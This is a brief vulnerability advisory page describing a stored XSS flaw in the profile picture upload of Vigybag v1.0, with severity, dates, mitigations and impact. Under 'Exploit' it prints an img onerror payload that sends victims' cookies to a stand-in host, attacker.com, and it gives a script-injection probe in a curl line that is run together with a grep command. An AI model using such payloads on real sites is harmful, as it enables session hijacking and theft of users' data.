Listen to this Post
How the CVE Works
CVE-2025-45002 is a stored Cross-Site Scripting (XSS) vulnerability in Vigybag v1.0 and earlier. The flaw exists in the profile picture upload function under “My Profile,” where user-supplied input is not properly sanitized. An attacker can upload a malicious image file containing embedded JavaScript code. When another user views the attacker’s profile, the script executes in their browser, allowing session hijacking, defacement, or malware delivery. The attack persists due to improper server-side validation of file metadata and content.
DailyCVE Form
Platform: Vigybag
Version: v1.0 and prior
Vulnerability: Stored XSS
Severity: Medium
Date: 06/23/2025
Prediction: Patch by 07/15/2025
What Undercode Say
Analytics:
curl -X GET "http://example.com/profile?user=<script>alert(1)</script>" grep -r "unsafe_html" /var/www/vigybag/
Exploit:
<img src="x" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
Protection from this CVE:
- Sanitize file upload metadata.
- Implement CSP headers.
- Patch to v1.1.
Impact:
- Session hijacking.
- Unauthorized actions.
- Data theft.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
